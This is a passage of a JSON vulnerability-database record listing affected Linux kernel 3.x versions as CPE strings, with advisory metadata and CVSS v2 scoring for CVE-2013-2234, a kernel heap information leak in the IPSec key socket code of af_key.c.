"cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:51", "description": "The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions in net/key/af_key.c in the Linux kernel before 3.10 do not initialize certain structure members, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify interface of an IPSec key_socket.", "edition": 6, "cvss3": {}, "published": "2013-07-04T21:55:00", "title": "CVE-2013-2234", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2234"], "modified": "2014-01-30T05:10:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", 